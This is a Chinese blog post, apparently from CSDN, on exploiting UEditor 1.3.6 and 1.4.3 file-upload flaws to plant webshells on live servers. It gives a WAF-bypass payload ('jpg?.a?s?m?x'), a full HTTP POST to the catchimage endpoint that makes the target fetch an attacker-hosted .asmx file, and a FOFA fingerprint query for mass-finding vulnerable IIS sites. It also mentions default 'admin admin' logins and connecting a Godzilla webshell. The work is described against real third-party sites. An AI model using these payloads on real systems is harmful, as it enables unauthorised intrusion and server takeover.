原创 | ueditor1.4.3-asmx绕过waf

最新推荐文章于 2024-04-26 09:27:37 发布
最新推荐文章于 2024-04-26 09:27:37 发布
阅读量2k 收藏 2
点赞数 2
分类专栏: 实战 web 文章标签: 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29437513/article/details/125966248
版权
web 同时被 2 个专栏收录
37 篇文章 20 订阅
订阅专栏
实战
27 篇文章 13 订阅
订阅专栏

前言: 这段时间老是碰到ueditor,前段时间hvv有红队也通过这拿到shell,谈下编辑器的上传

昨天晚上,群里有个哥们发了个ueditor的编辑器上传,总之他绕过了图片限制,ueditor的解析url是ip的格式,,但传webshell老是403,我也摸了下,,总结了一些原因

如果ueditor上传目录能解析脚本,只是单纯waf拦截的话:

bypass: poc:jpg?.a?s?m?x

解析1

先来说说ueditor1.4.3这编辑器的漏洞,18年出的net格式的上传,可上传绕过的版本有
ueditor/ 1.4.3 net
ueditor/ 1.3.6 net(实际测试不行)
ueditor/ 1.3.6 php

1.3.6环境绕过:
解析漏洞
ueditor 1.3.6 X-Powered-By: ThinkPHP + apache(换行解析和后缀名解析)

以上环境本地均能绕过文件上传

0x00 1.3.6的上传

上传文件Uploader.class.php 192行,文件后缀由$fileName = f o r m a t . format. format.ext; 控制,
226行,$ext不可控

private function getFileExt()
{
    return strtolower( strrchr( $this->file[ "name" ] , '.' ) );
}

文件命名

但1.3.6文件命名引入了format这个函数
而在imageUp.php里30-35行定义了format函数是直接post传参,这处可控,

直接post

实际演示poc:
给format传入参数,配合apache解析漏洞,比如传入1,可以自定义文件头

上传

0x02. 1.4.3net版本文件上传

这版本在hvv经常遇到,但实际利用起来很鸡肋,,
1.上传接口要能访问,不被策略拦截,
2.上传是否能绕过image,
3.上传目录脚本解析策略((2022年大部分ueditor都做了策略))

挖了大概有10来个ueditor站,大部分均存在服务器脚本解析。

案例1: 帮群友看的站

上传aspx成功,但访问403,上传有缺陷的aspx代码,报错但返回200

200

不知道什么原因,觉得可能是黑名单的问题,测试了ashx、asmx等都存在该问题,觉得不是服务器正则

google被动收集找了个ueditor,指纹(iis7.5 asp.net)的站点测试,发现是上传目录禁止执行脚本文件

403

=========================================
2022年了,google的被动信息收集真鸡肋,大部分都只能作为探测敏感信息的入口了,
google测了5-6个站,大部分站收录的结果都玩不了,,还是转向fofa的主动收集,
某指纹: app=“百度-UEditor” && server=“Microsoft-IIS/7.5”
结果还不错,测试了一波后,

结果

反手 admin admin
收录的结果在二级目录都存在ueditor编辑器的目录

套上ueditor文件上传poc

POST /resources/htmleditor/net/controller.ashx?action=catchimage&encode=utf-8 HTTP/1.1
Host: rhost:rport
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 53

source%5B%5D=http://ip:port/asmxx.jpg?.asmx

这里贴上tool绕过waf的poc:jpg?.a?s?m?x

jieix

看到上传成功,还是回到刚那个话题: 上传目录是否能解析脚本?
asmx是asp.net通过SOAP协议生成发送消息的功能。大概率能绕过正则,

正常解析

哥斯拉

总结:

1.ueditor 1.4.3文件上传主站通常难绕过上传,403,出洞的大多数在C段,
2.测绘批量收集ueditor的资产,

ECHO::
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ueidtor安全漏洞_UEditor上传漏洞复现
weixin_39956451的博客
01-13 495
UEditor编辑器介绍UEditor是由百度web前端研发部开发所见即所得富文本web编辑器,具有轻量,可定制,注重用户体验等特点,开源基于MIT协议,允许自由使用和修改代码。漏洞影响版本漏洞影响版本:1.4.3.3(.net),其他php,jsp,asp版本不受此UEditor漏洞的影响。最新版本为1.4.3.3,并且已经不支持更新了。漏洞复现过程1.漏洞地址:http://xxxxxxxx...
UEditor漏洞
2ed
07-29 1万+
UEditor是由百度开发的开源富文本编辑器,开源基于BSD协议,小巧灵活,使用简单,有很多web程序在使用UEditor编辑器。该任意文件上传漏洞存在于1.4.3.3和1.5.0版本中,并且只有.NET版本受该漏洞影响。黑客可以利用该漏洞上传木马文件,执行命令控制服务器
技术分享-ueditor漏洞利用&源码分析超详细分析
最新发布
zz12345600354的博客
04-26 595
ueditor漏洞主要存在于其上传功能中,攻击者可以利用上传漏洞将恶意脚本上传服务器,从而获取服务器的控制权或者进行其他恶意行为。攻击者一般通过修改上传文件的后缀名或者修改文件内容的方式来绕过服务器的安全检测。ueditor上传功能在其server下的文件Uploader.cs中实现。Uploader.cs中主要实现了文件上传的功能,并且包含了一些安全检测的代码。其中,一个重要的安全检测就是检测上传文件的后缀名是否在指定的白名单之内。
UEditor1.4.3.3的webshell漏洞攻击揭秘
热门推荐
主宰
10-09 1万+
前言 UEditor是一款所见即所得的开源富文本编辑器,具有轻量、可定制、用户体验优秀等特点,被广大WEB应用程序所使用。本次爆出的高危漏洞属于.NET版本,其它的版本暂时不受影响。漏洞成因是在抓取远程数据源的时候未对文件后缀名做验证导致任意文件写入漏洞,黑客利用此漏洞可以在服务器上执行任意指令,综合评级高危。由于时间仓促,本文分析不到位的地方还请多多谅解。 漏洞利用 笔者本地测试的编辑器是...
Ueditor编辑器任意文件上传漏洞
m0_51468027的博客
07-30 1万+
一文学习Ueditor编辑器任意文件上传漏洞(部署环境到漏洞复现)
实战 UEditor 任意文件上传漏洞
sweelg的博客
09-08 1437
漏洞影响UEditor的.Net版本,其它语言版本暂时未受影响 影响版本 1.4.3.3 .NET。
百度编辑器UEditor v1.4.3 PHP版 GBK
05-10
UEditor1.4.3更新说明修复hasContents接口在非ie下只有空格时判断还为真的问题 修复在粘贴word内容时,会误命中cm,pt这样的文本内容变成px的问题 优化删除编辑器再创建编辑器时,编辑器的容器id发生变化的问题 修复提交jsonp请求时,callback参数的xss漏洞 新增jsp后台多种服务器配置下的路径定位 修复ZeroClipboard的flash地址参数名称错误 修复getActionUrl的bug 整理配置参数,把遗漏在代码中的配置项整理到ueditor.config.js里 修复图片拉伸工具和编辑拉伸长高器的样式冲突 修复文字的unicod
ueditor1.4.3jsp utf-8版配置使用教程
01-13
该教程用于百度ueditor1.4.3jsp utf-8版使用时配置指导。仅对于初步使用者图片上传遇到困难的人或想将图片上传至数据库的的人适用。
百度ueditor 1.4.3版
03-21
1.4.3版 主要是为了防止百度升级 导致原有的jar不见,备份
百度富文本编辑器UEditor 1.4.3版本
07-20
百度富文本编辑器UEditor 1.4.3版本
qiniu_ueditor_1.4.3-master.zip
04-21
七牛云-utditor图片上传插件
本人亲测修改。现在分享出来。uedito织梦dede更换ueditor1.4.3 最新,内有说明教程。。及bug修复
06-16
本人亲测修改。现在分享出来。uedito织梦dede更换ueditor1.4.3 最新,内有说明教程。。及bug修复。 提示:覆盖前请做好备份。
UEditor 1.4.3.3完整源码
05-29
官网下载的百度UEditor1.4.3.3版本源码,可以自己编译源码,发布到项目中,实现自己的定制化需求
ueditor1.4.3.zip
08-05
UEditor是由百度web前端研发部开发所见即所得富文本web编辑器,具有轻量,可定制,注重用户体验等特点,开源基于MIT协议,允许自由使用和修改代码。
ueidtor安全漏洞_UEditor SSRF漏洞(JSP版本)分析与复现
weixin_33318722的博客
12-31 4709
作者: 浮萍@猎户安全实验室公众号:[猎户安全实验室](https://mp.weixin.qq.com/s/OPbyYQNWiN2dy_BHhqd9eg "猎户安全实验室")前些时间测试的时候遇到了一个系统采用了UEditor编辑器,版本为1.4.3。已知该编辑器v1.4.3版本存在SSRF漏洞,虽然是Bool型的SSRF,除了可以进行内网探测外,也可以根据web应用指纹信息,之后进行进一步的测...
ueditor上传视频再次访问回显失败问题
Love666Code的博客
04-17 5433
一、ueditor上传视频,第一次可以回显,当再次打开页面或者点击了工具栏左上角的html标签后视频回显失败的解决方法: 在网上看到好多关于修改whitList的,具体操作如下(ps:本人的没有效果,但依旧记录下来供参考): 1、修改ueditor.config.js文件中的whitList(大约在364行,设置白名单)中的img,在img标签名单后面添加’_url’和’style’,并且添加...
富文本编辑器Ueditor上传嵌入到框架中出现的问题。
qq_39351659的博客
07-11 737
1.没有办法显示ueditor页面原因是没有配置SpringMVC中对静态环境的放行,目录如下图所示,2.上传图片,显示后台没有加载原因,需要将jar包导入到WEB-INF下lib中,这样才能正确导入包,不然在ueditor下的controller.jsp没有办法访问到“import="com.baidu.ueditor.ActionEnter"”这个import3.页面上传后没有办法显示到页面上...
ueditor HTML 代码保存,不能正常回显
huzuxing的博客
06-12 5965
最近在集成百度ueditor富文本编辑器时,入库保存后是HTML内容,但是在回显的时候却不能正常显示相关HTML标签,样式。原因:    入库是HTML内容,回显时HTML标签没有被识别解决办法:    step1 : 获取编辑器的内容后,进行base64编码    step2 : 服务端对内容进行base64解码后保存    step3 : 服务端返回数据时进行base64编码    step4...
UEditor上传导致 XSS漏洞复现
afei001
07-16 2489
UEditor是由百度「FEX前端研发团队」开发的所见即所得富文本web编辑器,具有轻量,可定制,注重用户体验等特点,开源基于MIT协议,允许自由使用和修改代码。UEditorv1.4.3.3中存在跨站脚本(XSS)漏洞。...
ueditor1.4.3 .net
09-30
UEditor是一款基于JavaScript的富文本编辑器,1.4.3是其一个版本。而在.NET平台上,将该富文本编辑器与.NET框架进行了结合,形成了UEDitor1.4.3 .NET版本。 UEDitor1.4.3 .NET版本是一个为开发者提供的快速、灵活的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ECHO::

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值